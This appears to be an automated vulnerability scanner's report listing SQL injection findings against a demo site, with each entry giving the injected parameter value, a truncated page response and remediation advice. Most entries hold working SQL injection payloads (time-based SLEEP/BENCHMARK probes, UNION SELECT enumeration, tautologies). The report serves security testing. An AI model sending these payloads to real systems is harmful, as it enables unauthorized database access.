DemoUser1#\nCWE-ID CWE-89\nIssue Number #1793\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1794\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' '\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1795\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# and (select substring(@@version,2,1))='y'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1796\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1797Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or SLEEP(5)=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1798\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1799\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or SLEEP(5)='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1800\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1801\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1802\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or '1'='1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1803\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or benchmark(10000000,MD5(1))\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1804\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1805\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1806\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1807\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# + SLEEP(10) + '\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, 